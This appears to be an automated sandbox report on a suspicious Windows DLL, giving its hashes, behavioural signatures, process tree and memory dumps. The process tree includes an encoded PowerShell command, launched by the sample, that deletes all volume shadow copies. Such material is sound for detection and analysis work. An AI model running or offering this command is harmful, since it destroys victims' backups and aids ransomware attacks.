Analysis

  • max time kernel
    118s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:48

General

  • Target

    e64f7f4534f2e4e1adb0569db5e656fa747e4055b7a447c17640043864660e76.dll

  • Size

    115KB

  • MD5

    70e581726d1b0953892edd8c717006c6

  • SHA1

    094e15f0c84ba5603c616de21505de84534e3fb5

  • SHA256

    e64f7f4534f2e4e1adb0569db5e656fa747e4055b7a447c17640043864660e76

  • SHA512

    30cd1f76a4bb297b84d528dc667f5b0caf556edbfb8a4c9253b3e7110dac52b76741e4bee39db6ab586b8759e84618436342769a4f8163bb36b162b2dc3b1b15

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\e64f7f4534f2e4e1adb0569db5e656fa747e4055b7a447c17640043864660e76.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1520
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\e64f7f4534f2e4e1adb0569db5e656fa747e4055b7a447c17640043864660e76.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1680
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:580
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1688
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1116

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/580-55-0x000007FEFC3C1000-0x000007FEFC3C3000-memory.dmp
      Filesize

      8KB

    • memory/580-57-0x0000000002580000-0x0000000002582000-memory.dmp
      Filesize

      8KB

    • memory/580-56-0x000007FEF3790000-0x000007FEF42ED000-memory.dmp
      Filesize

      11.4MB

    • memory/580-58-0x0000000002582000-0x0000000002584000-memory.dmp
      Filesize

      8KB

    • memory/580-59-0x0000000002584000-0x0000000002587000-memory.dmp
      Filesize

      12KB

    • memory/580-60-0x000000000258B000-0x00000000025AA000-memory.dmp
      Filesize

      124KB

    • memory/1680-54-0x00000000766D1000-0x00000000766D3000-memory.dmp
      Filesize

      8KB